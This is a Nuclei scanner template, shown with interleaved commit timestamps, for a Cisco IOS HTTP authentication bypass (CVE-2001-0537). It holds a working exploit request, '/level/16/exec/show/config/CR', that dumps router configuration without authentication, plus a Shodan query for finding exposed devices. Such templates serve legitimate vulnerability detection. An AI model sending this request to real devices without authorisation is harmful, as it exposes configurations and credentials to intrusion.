nuclei-templates/http/cves/2001/CVE-2001-0537.yaml

48 lines
1.3 KiB
YAML
Raw Normal View History

2023-06-12 12:36:50 +00:00
id: CVE-2001-0537
info:
2023-06-20 09:16:12 +00:00
name: Cisco IOS HTTP Configuration - Authentication Bypass
2023-06-12 12:36:50 +00:00
author: DhiyaneshDK
2023-07-11 19:49:27 +00:00
severity: critical
2023-06-20 09:16:12 +00:00
description: |
HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
2023-06-12 12:36:50 +00:00
reference:
- https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/
2023-06-20 09:16:12 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2001-0537
2023-07-11 19:49:27 +00:00
- http://www.ciac.org/ciac/bulletins/l-106.shtml
2023-07-15 16:29:17 +00:00
- https://exchange.xforce.ibmcloud.com/vulnerabilities/6749
2023-06-12 12:36:50 +00:00
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
2023-07-11 19:49:27 +00:00
cvss-score: 9.3
2023-06-12 12:36:50 +00:00
cve-id: CVE-2001-0537
cwe-id: CWE-287
2023-08-31 11:46:18 +00:00
epss-score: 0.88063
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.9824
2023-06-12 12:36:50 +00:00
metadata:
max-request: 1
2023-06-20 09:16:12 +00:00
verified: true
2023-06-12 12:36:50 +00:00
shodan-query: product:"Cisco IOS http config" && 200
2023-07-11 19:49:27 +00:00
vendor: cisco
product: ios
2023-07-04 08:28:03 +00:00
tags: cve,cve2001,cisco,ios,auth-bypass
2023-06-12 12:36:50 +00:00
http:
- method: GET
path:
- '{{BaseURL}}/level/16/exec/show/config/CR'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'service config'
- 'Switch'
2023-06-19 12:31:31 +00:00
- 'default-gateway'
2023-06-12 12:36:50 +00:00
condition: and
- type: status
status:
- 200